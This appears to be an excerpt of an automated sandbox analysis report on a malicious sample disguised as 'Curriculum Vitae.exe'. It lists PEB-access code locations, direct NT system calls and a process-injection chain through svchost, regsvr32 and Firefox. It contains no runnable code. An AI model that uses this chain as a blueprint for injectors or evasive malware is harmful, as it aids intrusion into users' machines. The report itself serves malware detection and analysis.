            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] 2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] 2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] 2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h] 2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h] 2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h] 2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h] 2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] 2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] 2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] 2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] 2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h] 2_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h] 2_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h] 2_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h] 2_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] 2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h] 2_2_0306CA38
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] 2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] 2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] 2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h] 2_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] 2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] 2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h] 2_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h] 2_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] 2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h] 2_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] 2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h] 2_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] 2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] 2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] 2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h] 2_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] 2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h] 2_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h] 2_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h] 2_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] 2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h] 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] 2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h] 2_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] 2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] 2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h] 2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] 2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h] 2_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h] 2_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] 2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h] 2_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] 2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h] 2_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] 2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h] 2_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h] 2_2_03060854
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h] 2_2_03034859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h] 2_2_03034859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h] 2_2_030BE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h] 2_2_030BE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h] 2_2_030C6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h] 2_2_030C6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h] 2_2_03030887
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h] 2_2_030BC89D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0305E8C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_030FA8E4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0306C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0306C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h] 2_2_030E6F00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h] 2_2_03032F12
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h] 2_2_0306CF1F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe Code function: 0_2_00D90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00D90B62
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe Code function: 0_2_00D62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00D62622
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe Code function: 0_2_00D5083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00D5083F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe Code function: 0_2_00D509D5 SetUnhandledExceptionFilter, 0_2_00D509D5
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe Code function: 0_2_00D50C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00D50C21

HIPS / PFW / Operating System Protection Evasion

Source (shared by every record below): C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
NtAllocateVirtualMemory: Direct from: 0x76EF48EC
NtQueryAttributesFile: Direct from: 0x76EF2E6C
NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
NtQuerySystemInformation: Direct from: 0x76EF48CC
NtOpenSection: Direct from: 0x76EF2E0C
NtDeviceIoControlFile: Direct from: 0x76EF2AEC
NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
NtQueryInformationToken: Direct from: 0x76EF2CAC
NtCreateFile: Direct from: 0x76EF2FEC
NtOpenFile: Direct from: 0x76EF2DCC
NtTerminateThread: Direct from: 0x76EF2FCC
NtOpenKeyEx: Direct from: 0x76EF2B9C
NtSetInformationProcess: Direct from: 0x76EF2C5C
NtProtectVirtualMemory: Direct from: 0x76EF2F9C
NtWriteVirtualMemory: Direct from: 0x76EF2E3C
NtUnmapViewOfSection: Direct from: 0x76EF2D3C
NtNotifyChangeKey: Direct from: 0x76EF3C2C
NtCreateMutant: Direct from: 0x76EF35CC
NtResumeThread: Direct from: 0x76EF36AC
NtMapViewOfSection: Direct from: 0x76EF2D1C
NtProtectVirtualMemory: Direct from: 0x76EE7B2E
NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
NtQuerySystemInformation: Direct from: 0x76EF2DFC
NtReadFile: Direct from: 0x76EF2ADC
NtDelayExecution: Direct from: 0x76EF2DDC
NtQueryInformationProcess: Direct from: 0x76EF2C26
NtResumeThread: Direct from: 0x76EF2FBC
NtCreateUserProcess: Direct from: 0x76EF371C
NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
NtWriteVirtualMemory: Direct from: 0x76EF490C
NtSetInformationThread: Direct from: 0x76EE63F9
NtClose: Direct from: 0x76EF2B6C
NtSetInformationThread: Direct from: 0x76EF2B4C
NtReadVirtualMemory: Direct from: 0x76EF2E8C
NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\regsvr32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: read write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 5324
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread APC queued: target process: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 39D008
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D72BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DB22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"
Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D91663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Curriculum Vitae.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: Curriculum Vitae.exe, OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: OAIexgManRWDie.exe, 00000005.00000000.2579654272.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3270100790.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270497993.0000000001591000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D50698 cpuid
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D8D27A GetUserNameW
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D6B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
